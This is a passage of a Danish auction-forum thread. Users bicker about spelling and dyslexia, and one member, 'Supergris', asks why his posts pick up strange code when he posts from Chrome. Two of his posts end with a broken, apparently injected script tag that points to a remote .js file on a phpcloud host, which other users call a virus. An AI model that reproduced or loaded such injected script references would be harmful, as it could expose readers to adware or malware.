|
et godt kup |
Besvar | Side <12 |
Forfatter | |
B-R-I-N-E-T
Ny bruger Oprettet: 13-Januar-2010 Sted: DK Status: Offline Point: 7 |
Funktioner
Tak(0)
|
ordblind har jeg altid vært = og det er ikke noget jeg bruger som en undskyldning sorry
|
|
Supergris
Guld medlem Oprettet: 10-December-2006 Sted: Esbjerg Status: Offline Point: 1473 |
Funktioner
Tak(0)
|
Det er blot en simpel regel, som du også burde kunne lære, ordblind eller ej, så er det noget, du også kan bruge i fremtiden...< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
|
|
Dev
Ny bruger Oprettet: 01-Februar-2014 Sted: Aalborg Status: Offline Point: 19 |
Funktioner
Tak(0)
|
Mon ikke det var bedre du fik fjernet din "virus" i stedet for at rette ligegyldige skrivefejl Supergris? ;)
|
|
Supergris
Guld medlem Oprettet: 10-December-2006 Sted: Esbjerg Status: Offline Point: 1473 |
Funktioner
Tak(0)
|
Jeg har nu kørt en grundig virusscan, og genstartet computeren, men problemet er der stadig, og sker kun i dette forum.
Nogle, der har en løsning på problemet? Jeg kan ikke google det, da siden bliver blokeret... Redigeret af Supergris - 11-April-2014 kl. 04:23 |
|
Supergris
Funktioner
Tak(0)
|
En test for at se, om problemet er løst.
Undskyld til trådstarter, for at bruge hans tråd... :) Åbenbart er det kun, når jeg bruger Chrome, at problemet opstår. Mystisk, men sådan er der så meget... Redigeret af Supergris - 11-April-2014 kl. 05:51 |
|
Supergris
Funktioner
Tak(0)
|
Lige en test mere med Chrome, så kan vi holde tråden i live...:)< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
|
|
Supergris
Funktioner
Tak(0)
|
Samme skrevet fra Explorer...
MYSTISK. |
|
inside
Bruger Oprettet: 21-Februar-2005 Sted: Denmark Status: Offline Point: 190 |
Funktioner
Tak(0)
|
Du er ikke den eneste med det problem ser det ud til :)
Hvad løsningen er, ved jeg dog ikke!
Redigeret af inside - 11-April-2014 kl. 10:08 |
|
Steve Jones
Guld medlem Oprettet: 30-Juli-2010 Status: Offline Point: 1809 |
Funktioner
Tak(0)
|
Har du samme tankegang med auktioner som starter ved 1 krone?
|
|
Supergris
Funktioner
Tak(0)
|
Her er et link, til én, der har samme problem som mig.
http://www.vizzed.com/boards/thread.php?id=74085&page=0 Det opstår KUN i dette forum indtil videre, og kun når jeg bruger Chrome. Ingen der har hørt om dette mystiske fænomen, eller har et bud på, hvad det kan være. P.S. Jeg er en meget erfaren PC-bruger, men kan ikke gennemskue dette, så alle forslag modtages med kyshånd, da jeg hader, når der er noget, der ikke kan løses... :( Redigeret af Supergris - 11-April-2014 kl. 19:41 |
|
Besvar | Side <12 |
Skift forum | Forum-tilladelser Du kan ikke oprette nye emner i dette forum Du kan ikke besvare indlæg i dette forum Du kan ikke slette dine indlæg i dette forum Du kan ikke redigere dine indlæg i dette forum Du kan ikke oprette afstemninger i dette forum Du kan ikke stemme i dette forum |